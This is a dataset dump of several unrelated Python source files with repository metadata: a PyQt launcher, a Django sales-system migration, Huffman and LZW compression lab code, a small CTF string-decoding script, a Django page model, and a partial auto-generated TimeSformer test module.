/pycrafter4500_stepper-based-master/client side/main.pyw
|
352e3666a7ac67425afd02f1773cbd6bcd420f90
|
[] |
no_license
|
ZhaoxinLee/MagRobotPrinter
|
d5f3cbde4551aac9e819df71902ed57dbcaea463
|
43ceaf7ea5e4d3cb7622c14585250c95876a87ec
|
refs/heads/master
| 2022-09-09T02:17:01.265454 | 2022-08-17T21:38:10 | 2022-08-17T21:38:10 | 195,290,571 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 286 |
pyw
|
import sys
from callbacks import GUI
from PyQt5 import QtWidgets
import warnings
warnings.filterwarnings("ignore")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
window = GUI()
window.move(150,100)
window.show()
sys.exit(app.exec_())
|
[
"[email protected]"
] | |
9726353f578aad3a94526c5f75342b308e3a2e1c
|
6926bcf24f96568972cfd58b3490fe40c61ae390
|
/sales/migrations/0001_initial.py
|
079b37bde8a1add42e930545014f043664241939
|
[] |
no_license
|
wencong1724427771/Backend-management-system
|
64f597a9be15cd4d70ed8918291c4019c192e123
|
9c78c49098256d5f6dd7672646f14c677e48564a
|
refs/heads/master
| 2023-08-07T15:32:52.045784 | 2021-09-19T02:33:59 | 2021-09-19T02:33:59 | 376,212,971 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,806 |
py
|
# Generated by Django 3.2.6 on 2021-08-29 09:51
from django.db import migrations, models
import django.db.models.deletion
import multiselectfield.db.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('rbac', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Campuses',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, verbose_name='校区')),
('address', models.CharField(blank=True, max_length=512, null=True, verbose_name='详细地址')),
],
options={
'verbose_name': '校区表',
'verbose_name_plural': '校区表',
},
),
migrations.CreateModel(
name='ClassList',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('course', models.CharField(choices=[('LinuxL', 'Linux中高级'), ('PythonFullStack', 'Python高级全栈开发')], max_length=64, verbose_name='课程名称')),
('semester', models.IntegerField(verbose_name='学期')),
('price', models.IntegerField(default=10000, verbose_name='学费')),
('memo', models.CharField(blank=True, max_length=100, null=True, verbose_name='说明')),
('start_date', models.DateField(verbose_name='开班日期')),
('graduate_date', models.DateField(blank=True, null=True, verbose_name='结业日期')),
('class_type', models.CharField(blank=True, choices=[('fulltime', '脱产班'), ('online', '网络班'), ('weekend', '周末班')], max_length=64, null=True, verbose_name='班级类型')),
('campuses', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.campuses', verbose_name='校区')),
],
),
migrations.CreateModel(
name='Department',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=32)),
('count', models.IntegerField()),
],
),
migrations.CreateModel(
name='UserInfo',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=16)),
('password', models.CharField(max_length=32)),
('telephone', models.CharField(max_length=11)),
('email', models.EmailField(max_length=254)),
('is_active', models.BooleanField(default=True)),
('depart', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='sales.department')),
('roles', models.ManyToManyField(to='rbac.Role')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('qq', models.CharField(help_text='QQ号必须唯一', max_length=64, unique=True, verbose_name='QQ')),
('qq_name', models.CharField(blank=True, max_length=64, null=True, verbose_name='QQ昵称')),
('name', models.CharField(blank=True, help_text='学员报名后,请改为真实姓名', max_length=32, null=True, verbose_name='姓名')),
('sex', models.CharField(blank=True, choices=[('male', '男性'), ('female', '女性')], default='male', max_length=16, null=True, verbose_name='性别')),
('birthday', models.DateField(blank=True, default=None, help_text='格式yyyy-mm-dd', null=True, verbose_name='出生日期')),
('phone', models.CharField(blank=True, max_length=11, null=True, verbose_name='手机号')),
('source', models.CharField(choices=[('qq', 'qq群'), ('referral', '内部转介绍'), ('website', '官方网站'), ('baidu_ads', '百度推广'), ('office_direct', '直接上门'), ('WoM', '口碑'), ('public_class', '公开课'), ('website_luffy', '路飞官网'), ('others', '其它')], default='qq', max_length=64, verbose_name='客户来源')),
('course', multiselectfield.db.fields.MultiSelectField(choices=[('LinuxL', 'Linux中高级'), ('PythonFullStack', 'Python高级全栈开发')], max_length=22, verbose_name='咨询课程')),
('class_type', models.CharField(choices=[('fulltime', '脱产班'), ('online', '网络班'), ('weekend', '周末班')], default='fulltime', max_length=64, verbose_name='班级类型')),
('customer_note', models.TextField(blank=True, null=True, verbose_name='客户备注')),
('status', models.CharField(choices=[('signed', '已报名'), ('unregistered', '未报名'), ('studying', '学习中'), ('paid_in_full', '学费已交齐')], default='unregistered', help_text='选择客户此时的状态', max_length=64, verbose_name='状态')),
('date', models.DateTimeField(auto_now_add=True, verbose_name='咨询日期')),
('last_consult_date', models.DateField(auto_now_add=True, verbose_name='最后跟进日期')),
('next_date', models.DateField(blank=True, null=True, verbose_name='预计再次跟进时间')),
('deal_date', models.DateField(blank=True, null=True)),
('class_list', models.ManyToManyField(blank=True, to='sales.ClassList', verbose_name='已报班级')),
('consultant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='customers', to='sales.userinfo', verbose_name='销售')),
('introduce_from', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='转介绍自学员')),
],
options={
'verbose_name': '客户信息表',
'verbose_name_plural': '客户信息表',
'ordering': ['id'],
},
),
migrations.CreateModel(
name='CourseRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('day_num', models.IntegerField(help_text='此处填写第几节课或第几天课程...,必须为数字', verbose_name='节次')),
('date', models.DateField(auto_now_add=True, verbose_name='上课日期')),
('course_title', models.CharField(blank=True, max_length=64, null=True, verbose_name='本节课程标题')),
('course_memo', models.TextField(blank=True, max_length=300, null=True, verbose_name='本节课程内容')),
('has_homework', models.BooleanField(default=True, verbose_name='本节有作业')),
('homework_title', models.CharField(blank=True, max_length=64, null=True, verbose_name='本节作业标题')),
('homework_memo', models.TextField(blank=True, max_length=500, null=True, verbose_name='作业描述')),
('scoring_point', models.TextField(blank=True, max_length=300, null=True, verbose_name='得分点')),
('re_class', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.classlist', verbose_name='班级')),
('teacher', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.userinfo', verbose_name='讲师')),
],
options={
'unique_together': {('re_class', 'day_num')},
},
),
migrations.CreateModel(
name='ConsultRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('note', models.TextField(verbose_name='跟进内容...')),
('status', models.CharField(choices=[('A', '近期无报名计划'), ('B', '1个月内报名'), ('C', '2周内报名'), ('D', '1周内报名'), ('E', '定金'), ('F', '到班'), ('G', '全款'), ('H', '无效')], help_text='选择客户此时的状态', max_length=8, verbose_name='跟进状态')),
('date', models.DateTimeField(auto_now_add=True, verbose_name='跟进日期')),
('delete_status', models.BooleanField(default=False, verbose_name='删除状态')),
('consultant', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='records', to='sales.userinfo', verbose_name='跟进人')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='所咨询客户')),
],
),
migrations.AddField(
model_name='classlist',
name='teachers',
field=models.ManyToManyField(to='sales.UserInfo', verbose_name='老师'),
),
migrations.CreateModel(
name='StudyRecord',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('attendance', models.CharField(choices=[('checked', '已签到'), ('vacate', '请假'), ('late', '迟到'), ('absence', '缺勤'), ('leave_early', '早退')], default='checked', max_length=64, verbose_name='考勤')),
('score', models.IntegerField(choices=[(100, 'A+'), (90, 'A'), (85, 'B+'), (80, 'B'), (70, 'B-'), (60, 'C+'), (50, 'C'), (40, 'C-'), (0, ' D'), (-1, 'N/A'), (-100, 'COPY'), (-1000, 'FAIL')], default=-1, verbose_name='本节成绩')),
('homework_note', models.CharField(blank=True, max_length=255, null=True, verbose_name='作业批语')),
('date', models.DateTimeField(auto_now_add=True)),
('note', models.CharField(blank=True, max_length=255, null=True, verbose_name='备注')),
('homework', models.FileField(blank=True, default=None, null=True, upload_to='', verbose_name='作业文件')),
('course_record', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.courserecord', verbose_name='某节课程')),
('student', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='学员')),
],
options={
'unique_together': {('course_record', 'student')},
},
),
migrations.CreateModel(
name='Enrollment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('why_us', models.TextField(blank=True, default=None, max_length=1024, null=True, verbose_name='为什么报名')),
('your_expectation', models.TextField(blank=True, max_length=1024, null=True, verbose_name='学完想达到的具体期望')),
('contract_approved', models.BooleanField(default=False, help_text='在审阅完学员的资料无误后勾选此项,合同即生效', verbose_name='审批通过')),
('enrolled_date', models.DateTimeField(auto_now_add=True, verbose_name='报名日期')),
('memo', models.TextField(blank=True, null=True, verbose_name='备注')),
('delete_status', models.BooleanField(default=False, verbose_name='删除状态')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.customer', verbose_name='客户名称')),
('enrolment_class', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.classlist', verbose_name='所报班级')),
('school', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sales.campuses')),
],
options={
'verbose_name': '报名表',
'verbose_name_plural': '报名表',
'unique_together': {('enrolment_class', 'customer')},
},
),
migrations.AlterUniqueTogether(
name='classlist',
unique_together={('course', 'semester', 'campuses')},
),
]
|
[
"[email protected]"
] | |
43b8c08aef019d6e918ec740a570488a43396bcf
|
1ebed017fec5d8c7ec9fe11a593f7e42a1e09083
|
/lab_03_11.py
|
ce18050e27ab7c9730b89c193a93bae9535555a5
|
[] |
no_license
|
Captain-on-time/Info-Labs-6
|
714b5b56ff5569fc8da9091df3851a551a2e6b93
|
55a54df614209f8e946d2c497d9fd6537c88d65d
|
refs/heads/main
| 2023-02-20T15:24:31.684267 | 2021-01-24T16:44:38 | 2021-01-24T16:44:38 | 332,487,627 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,145 |
py
|
from heapq import heappush as insert, heappop as pop
class Node:
def init(self):
self.value = None
def createDict(self):
if self.value != None:
return dict([(self.value, "")])
Dict = dict()
if self.left != None:
Dict_l = self.left.createDict()
for i in Dict_l.keys():
Dict_l[i] = '0' + Dict_l[i]
Dict.update(Dict_l)
if self.right != None:
Dict_r = self.right.createDict()
for i in Dict_r.keys():
Dict_r[i] = '1' + Dict_r[i]
Dict.update(Dict_r)
return Dict
def encodeHuffman(fileIn, fileOut):
file_i = open(fileIn, "r")
txt = file_i.read()
file_i.close
symbols = set(txt)
q = []
i = 0
for s in symbols:
count = list(txt).count(s)
insert(q, (count, i, s))
i+=1
while len(q) != 1:
left = pop(q)
right = pop(q)
left_e = None
right_e = None
n = Node()
if not(isinstance(left[-1], Node)):
left_e = Node()
left_e.value = left[-1]
else:
left_e = left[-1]
if not(isinstance(right[-1], Node)):
right_e = Node()
right_e.value = right[-1]
else:
right_e = right[-1]
n.left = left_e
n.right = right_e
p = left[0]+right[0]
insert(q, (p, i, n))
i+=1
Dict = pop(q)[-1].createDict()
file_o = open(fileOut, "w")
for i in Dict.keys():
file_o.write(str(ord(i)) + " " + _dict[i] + " ")
file_o.write('\n')
encoded = ""
for s in txt:
encoded += Dict[s]
file_o.write(encoded)
file_o.close()
print("Huffman: " + str((len(encoded)/(len(txt)*8))*100) + "%")
def decodeHuffman(fileIn, fileOut):
file_i = open(fileIn, "r")
str1 = file_i.readline()
str2 = file_i.readline()
file_i.close
a = str1.split(" ")
Dict = dict()
for i in range(0, len(a), 2):
if a[i] == '\n':
continue
Dict[a[i+1]] = chr(int(a[i]))
s = ""
start = 0
stop = 1
while start < len(str2):
sl = str2[start:stop]
if (Dict.get(sl, "") == ""):
stop += 1
continue
else:
s += _dict.get(sl)
start = stop
stop += 1
file_o = open(fileOut, "w")
file_o.write(s)
file_o.close()
encodeHuffman("text.txt", "text_e_huf.txt")
decodeHuffman("text_e_huf.txt", "text_d_huf.txt")
def bin_l(a, length):
bin_str = bin(a).replace("0b", "")
while len(bin_str) != length:
bin_str = '0' + bin_str
return bin_str
def encodeLZW(fileIn, fileOut):
comb = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
"O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r",
"s", "t", "u", "v", "w", "x", "y", "z", " ", "'", "-", ",", ".", ";"]
base_length = 6
file_i = open(fileIn, "r");
txt = file_i.read()
file_i.close()
out = ""
buff = ""
for c in range(0, len(txt)):
buff += txt[c]
if buff in comb:
continue
else:
comb.append(buff)
out += bin_l(comb.index(buff[:len(buff)-1]), base_length)
if (c+1) == len(txt):
out += bin_l(comb.index(txt[c]), base_length)
break
buff = buff[-1:]
if len(comb) > 2**base_length:
base_length += 1
print(comb)
file_o = open(fileOut, "w")
file_o.write(out)
file_o.close()
print("LZW: " + str((len(out)/(len(txt)*8))*100) + "%")
def decodeLZW(fileIn, fileOut):
comb = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
"O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r",
"s", "t", "u", "v", "w", "x", "y", "z", " ", "'", "-", ",", ".", ";"]
base_length = 6
file_i = open(fileIn, "r");
txt = file_i.read()
file_i.close()
out = ""
start = 0
while start < len(txt):
cur = int(txt[start:start+base_length], 2)
out += comb[cur]
if start != 0: comb[-1] += comb[cur][0]
comb.append(comb[cur])
start += base_length
if len(comb) > 2**base_length:
base_length += 1
file_o = open(fileOut, "w")
file_o.write(out)
file_o.close()
print(comb)
encodeLZW("text.txt", "text_e.txt")
print("\n")
decodeLZW("text_e.txt", "text_d.txt")
|
[
"[email protected]"
] | |
6712d458cdfadfd2c8461273e0c8f6eccdd02d0f
|
58cef2a341f2a19ea0e8d0e9f3a79a386d9b72cf
|
/manage.py
|
73bee40ef8964a7d5ca6176bba700c87bf2d5681
|
[] |
no_license
|
Ujjawal-Anand/Stackflow
|
9a8a5af4e4c9e0fb9d5322f70413d1906500d085
|
c71bbd8de97566c2773d3b29f669211240a01c42
|
refs/heads/master
| 2022-12-11T00:08:48.619781 | 2020-09-03T16:44:35 | 2020-09-03T16:44:35 | 290,780,334 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 629 |
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'StackFlow.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
e0e9990a35ed37a9ba3a659c967e7ba2811dfa3f
|
c717e0ead7596d7e32ad2c0d2a1a1fd9a50b405e
|
/sqrt-i/XX-01-2021/25-01-2021/decypher.py
|
0c4dfc9cc0cfed332dd1adeb0d90f464a8769e55
|
[] |
no_license
|
tom-xs/CTF_notes
|
6cbf3ba8bdf085c5b51ec1d5a81d5b528bc1b117
|
4926094a86400e6a9895139219a299062c574c29
|
refs/heads/master
| 2023-03-14T06:47:51.347772 | 2021-03-01T00:01:17 | 2021-03-01T00:01:17 | 327,574,415 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 872 |
py
|
def reverse(s):
p1 = ""
#subtrai 5 de cada in
for n in s:
n = ord(n)
n -=5
n = chr(n)
p1+=n
#print(p1)
#cria lista vazia l1
l1 = []
for i in range(7):
l1.append("")
#divide o "p1" em lista
l1[0] = p1[0]
n = int(len(p1)/6)
c = 1
for i in range(1,len(p1[0:]),n):
l1[c] = p1[i:i+n]
c+=1
#reordena "p1" que vira p2
p2 = ""
c = 0
for i in range(len(l1)):
for j in range(len(l1)):
try:
p2+=l1[j][c]
except:
pass
c+=1
#print(p2)
#adiciona 8 a cada char
p3 = ""
for n in p2:
n = ord(n)
n+=8
n=chr(n)
p3+=n
print(p3)
reverse("f`k\\0\kmqd-^40ecokhetbx^\..\o`q_kp`z-!od\.")
|
[
"[email protected]"
] | |
d597d8f7dada7c93d9e4088b7bf43f7a8e2746bf
|
82c78e393266bf2b4cc4a217ae8da7f9d0578bca
|
/pages/models.py
|
a3113708b358ea48f55b07615d59205a8711cc6a
|
[] |
no_license
|
SUXUMI/simpleCMS-django
|
9017453a15c96a1568e4dd15aa9dc9238dd297de
|
1973966365c89c30e7d52c3fcf6409cef4c20807
|
refs/heads/main
| 2023-02-17T16:02:16.070287 | 2021-01-18T07:10:34 | 2021-01-18T07:10:34 | 330,578,145 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 680 |
py
|
from django.db import models
from django.utils import timezone
class Page(models.Model):
title = models.CharField(max_length=255, blank=False)
# slug = models.CharField(max_length=255, unique=True, blank=False)
# https://www.geeksforgeeks.org/slugfield-django-models/
slug = models.SlugField(max_length=64, unique=True)
meta_description = models.CharField(max_length=255)
content = models.TextField(null=True, blank=True)
create_dt = models.DateTimeField(default=timezone.now)
update_dt = models.DateTimeField(auto_now=True)
# https://docs.djangoproject.com/en/2.2/ref/contrib/admin/actions/
def __str__(self):
return self.title
|
[
"[email protected]"
] | |
0a912a7112a0beabf813cc00fba1cdb7c2e3daad
|
d35167f7ab29813d926bd702fa652090556befdf
|
/generated/test_facebookresearch_TimeSformer.py
|
7cf65f94103dda891ae436570da86b4a73b849eb
|
[] |
no_license
|
jansel/pytorch-jit-paritybench
|
65e5311d43daf5065beac52a68488ce188199fa8
|
7e55a422588c1d1e00f35a3d3a3ff896cce59e18
|
refs/heads/master
| 2023-08-12T04:43:16.669114 | 2023-06-08T17:36:32 | 2023-06-08T17:36:32 | 270,464,378 | 35 | 15 | null | 2023-06-08T17:36:34 | 2020-06-07T23:42:50 |
Python
|
UTF-8
|
Python
| false | false | 111,676 |
py
|
import sys
_module = sys.modules[__name__]
del sys
setup = _module
timesformer = _module
config = _module
defaults = _module
datasets = _module
build = _module
cv2_transform = _module
decoder = _module
kinetics = _module
loader = _module
multigrid_helper = _module
ssv2 = _module
transform = _module
utils = _module
video_container = _module
models = _module
batchnorm_helper = _module
build = _module
conv2d_same = _module
custom_video_model_builder = _module
features = _module
head_helper = _module
helpers = _module
linear = _module
losses = _module
nonlocal_helper = _module
operators = _module
optimizer = _module
resnet_helper = _module
stem_helper = _module
video_model_builder = _module
vit = _module
vit_utils = _module
ava_eval_helper = _module
ava_evaluation = _module
label_map_util = _module
metrics = _module
np_box_list = _module
np_box_list_ops = _module
np_box_mask_list = _module
np_box_mask_list_ops = _module
np_box_ops = _module
np_mask_ops = _module
object_detection_evaluation = _module
per_image_evaluation = _module
standard_fields = _module
benchmark = _module
bn_helper = _module
c2_model_loading = _module
checkpoint = _module
distributed = _module
env = _module
logging = _module
lr_policy = _module
meters = _module
metrics = _module
misc = _module
multigrid = _module
multiprocessing = _module
parser = _module
weight_init_helper = _module
visualization = _module
tensorboard_vis = _module
utils = _module
run_net = _module
submit = _module
test_net = _module
train_net = _module
visualization = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
patch_functional()
open = mock_open()
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
_global_config = args = argv = cfg = config = params = _mock_config()
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range
wraps = functools.wraps
import math
import numpy as np
import random
import torch
import torchvision.io as io
import torch.utils.data
import itertools
from torch.utils.data._utils.collate import default_collate
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import RandomSampler
from torch.utils.data.sampler import Sampler
from itertools import chain as chain
import logging
import time
from collections import defaultdict
from functools import partial
import torch.distributed as dist
import torch.nn as nn
from torch.autograd.function import Function
import torch.nn.functional as F
from typing import Tuple
from typing import Optional
from typing import List
from collections import OrderedDict
from copy import deepcopy
from typing import Dict
from typing import Callable
import torch.utils.model_zoo as model_zoo
from torch import nn as nn
from torch import einsum
from torch.nn.modules.module import Module
from torch.nn.modules.activation import MultiheadAttention
from torch.nn import ReplicationPad3d
import copy
import warnings
from itertools import repeat
import functools
from collections import deque
from sklearn.metrics import average_precision_score
from matplotlib import pyplot as plt
from torch import nn
import logging as log
import matplotlib.pyplot as plt
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from sklearn.metrics import confusion_matrix
import scipy.io
class SubBatchNorm3d(nn.Module):
"""
The standard BN layer computes stats across all examples in a GPU. In some
cases it is desirable to compute stats across only a subset of examples
(e.g., in multigrid training https://arxiv.org/abs/1912.00998).
SubBatchNorm3d splits the batch dimension into N splits, and run BN on
each of them separately (so that the stats are computed on each subset of
examples (1/N of batch) independently. During evaluation, it aggregates
the stats from all splits into one BN.
"""
def __init__(self, num_splits, **args):
"""
Args:
num_splits (int): number of splits.
args (list): other arguments.
"""
super(SubBatchNorm3d, self).__init__()
self.num_splits = num_splits
num_features = args['num_features']
if args.get('affine', True):
self.affine = True
args['affine'] = False
self.weight = torch.nn.Parameter(torch.ones(num_features))
self.bias = torch.nn.Parameter(torch.zeros(num_features))
else:
self.affine = False
self.bn = nn.BatchNorm3d(**args)
args['num_features'] = num_features * num_splits
self.split_bn = nn.BatchNorm3d(**args)
def _get_aggregated_mean_std(self, means, stds, n):
"""
Calculate the aggregated mean and stds.
Args:
means (tensor): mean values.
stds (tensor): standard deviations.
n (int): number of sets of means and stds.
"""
mean = means.view(n, -1).sum(0) / n
std = stds.view(n, -1).sum(0) / n + ((means.view(n, -1) - mean) ** 2).view(n, -1).sum(0) / n
return mean.detach(), std.detach()
def aggregate_stats(self):
"""
Synchronize running_mean, and running_var. Call this before eval.
"""
if self.split_bn.track_running_stats:
self.bn.running_mean.data, self.bn.running_var.data = self._get_aggregated_mean_std(self.split_bn.running_mean, self.split_bn.running_var, self.num_splits)
def forward(self, x):
if self.training:
n, c, t, h, w = x.shape
x = x.view(n // self.num_splits, c * self.num_splits, t, h, w)
x = self.split_bn(x)
x = x.view(n, c, t, h, w)
else:
x = self.bn(x)
if self.affine:
x = x * self.weight.view((-1, 1, 1, 1))
x = x + self.bias.view((-1, 1, 1, 1))
return x
class GroupGather(Function):
"""
GroupGather performs all gather on each of the local process/ GPU groups.
"""
@staticmethod
def forward(ctx, input, num_sync_devices, num_groups):
"""
Perform forwarding, gathering the stats across different process/ GPU
group.
"""
ctx.num_sync_devices = num_sync_devices
ctx.num_groups = num_groups
input_list = [torch.zeros_like(input) for k in range(du.get_local_size())]
dist.all_gather(input_list, input, async_op=False, group=du._LOCAL_PROCESS_GROUP)
inputs = torch.stack(input_list, dim=0)
if num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // num_sync_devices
inputs = inputs[group_idx * num_sync_devices:(group_idx + 1) * num_sync_devices]
inputs = torch.sum(inputs, dim=0)
return inputs
@staticmethod
def backward(ctx, grad_output):
"""
Perform backwarding, gathering the gradients across different process/ GPU
group.
"""
grad_output_list = [torch.zeros_like(grad_output) for k in range(du.get_local_size())]
dist.all_gather(grad_output_list, grad_output, async_op=False, group=du._LOCAL_PROCESS_GROUP)
grads = torch.stack(grad_output_list, dim=0)
if ctx.num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // ctx.num_sync_devices
grads = grads[group_idx * ctx.num_sync_devices:(group_idx + 1) * ctx.num_sync_devices]
grads = torch.sum(grads, dim=0)
return grads, None, None
class NaiveSyncBatchNorm3d(nn.BatchNorm3d):
def __init__(self, num_sync_devices, **args):
"""
Naive version of Synchronized 3D BatchNorm.
Args:
num_sync_devices (int): number of device to sync.
args (list): other arguments.
"""
self.num_sync_devices = num_sync_devices
if self.num_sync_devices > 0:
assert du.get_local_size() % self.num_sync_devices == 0, (du.get_local_size(), self.num_sync_devices)
self.num_groups = du.get_local_size() // self.num_sync_devices
else:
self.num_sync_devices = du.get_local_size()
self.num_groups = 1
super(NaiveSyncBatchNorm3d, self).__init__(**args)
def forward(self, input):
if du.get_local_size() == 1 or not self.training:
return super().forward(input)
assert input.shape[0] > 0, 'SyncBatchNorm does not support empty inputs'
C = input.shape[1]
mean = torch.mean(input, dim=[0, 2, 3, 4])
meansqr = torch.mean(input * input, dim=[0, 2, 3, 4])
vec = torch.cat([mean, meansqr], dim=0)
vec = GroupGather.apply(vec, self.num_sync_devices, self.num_groups) * (1.0 / self.num_sync_devices)
mean, meansqr = torch.split(vec, C)
var = meansqr - mean * mean
self.running_mean += self.momentum * (mean.detach() - self.running_mean)
self.running_var += self.momentum * (var.detach() - self.running_var)
invstd = torch.rsqrt(var + self.eps)
scale = self.weight * invstd
bias = self.bias - mean * scale
scale = scale.reshape(1, -1, 1, 1, 1)
bias = bias.reshape(1, -1, 1, 1, 1)
return input * scale + bias
def get_same_padding(x: int, k: int, s: int, d: int):
return max((int(math.ceil(x // s)) - 1) * s + (k - 1) * d + 1 - x, 0)
def pad_same(x, k, s, d=(1, 1), value=0):
ih, iw = x.size()[-2:]
pad_h, pad_w = get_same_padding(ih, k[0], s[0], d[0]), get_same_padding(iw, k[1], s[1], d[1])
if pad_h > 0 or pad_w > 0:
x = F.pad(x, [pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2], value=value)
return x
def conv2d_same(x, weight: torch.Tensor, bias: Optional[torch.Tensor]=None, stride: Tuple[int, int]=(1, 1), padding: Tuple[int, int]=(0, 0), dilation: Tuple[int, int]=(1, 1), groups: int=1):
x = pad_same(x, weight.shape[-2:], stride, dilation)
return F.conv2d(x, weight, bias, stride, (0, 0), dilation, groups)
class Conv2dSame(nn.Conv2d):
""" Tensorflow like 'SAME' convolution wrapper for 2D convolutions
"""
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
super(Conv2dSame, self).__init__(in_channels, out_channels, kernel_size, stride, 0, dilation, groups, bias)
def forward(self, x):
return conv2d_same(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
class FeatureInfo:
def __init__(self, feature_info: List[Dict], out_indices: Tuple[int]):
prev_reduction = 1
for fi in feature_info:
assert 'num_chs' in fi and fi['num_chs'] > 0
assert 'reduction' in fi and fi['reduction'] >= prev_reduction
prev_reduction = fi['reduction']
assert 'module' in fi
self.out_indices = out_indices
self.info = feature_info
def from_other(self, out_indices: Tuple[int]):
return FeatureInfo(deepcopy(self.info), out_indices)
def get(self, key, idx=None):
""" Get value by key at specified index (indices)
if idx == None, returns value for key at each output index
if idx is an integer, return value for that feature module index (ignoring output indices)
if idx is a list/tupple, return value for each module index (ignoring output indices)
"""
if idx is None:
return [self.info[i][key] for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [self.info[i][key] for i in idx]
else:
return self.info[idx][key]
def get_dicts(self, keys=None, idx=None):
""" return info dicts for specified keys (or all if None) at specified indices (or out_indices if None)
"""
if idx is None:
if keys is None:
return [self.info[i] for i in self.out_indices]
else:
return [{k: self.info[i][k] for k in keys} for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [(self.info[i] if keys is None else {k: self.info[i][k] for k in keys}) for i in idx]
else:
return self.info[idx] if keys is None else {k: self.info[idx][k] for k in keys}
def channels(self, idx=None):
""" feature channels accessor
"""
return self.get('num_chs', idx)
def reduction(self, idx=None):
""" feature reduction (output stride) accessor
"""
return self.get('reduction', idx)
def module_name(self, idx=None):
""" feature module name accessor
"""
return self.get('module', idx)
def __getitem__(self, item):
return self.info[item]
def __len__(self):
return len(self.info)
def _get_feature_info(net, out_indices):
feature_info = getattr(net, 'feature_info')
if isinstance(feature_info, FeatureInfo):
return feature_info.from_other(out_indices)
elif isinstance(feature_info, (list, tuple)):
return FeatureInfo(net.feature_info, out_indices)
else:
assert False, 'Provided feature_info is not valid'
def _get_return_layers(feature_info, out_map):
module_names = feature_info.module_name()
return_layers = {}
for i, name in enumerate(module_names):
return_layers[name] = out_map[i] if out_map is not None else feature_info.out_indices[i]
return return_layers
def _module_list(module, flatten_sequential=False):
ml = []
for name, module in module.named_children():
if flatten_sequential and isinstance(module, nn.Sequential):
for child_name, child_module in module.named_children():
combined = [name, child_name]
ml.append(('_'.join(combined), '.'.join(combined), child_module))
else:
ml.append((name, name, module))
return ml
class FeatureDictNet(nn.ModuleDict):
""" Feature extractor with OrderedDict return
Wrap a model and extract features as specified by the out indices, the network is
partially re-built from contained modules.
There is a strong assumption that the modules have been registered into the model in the same
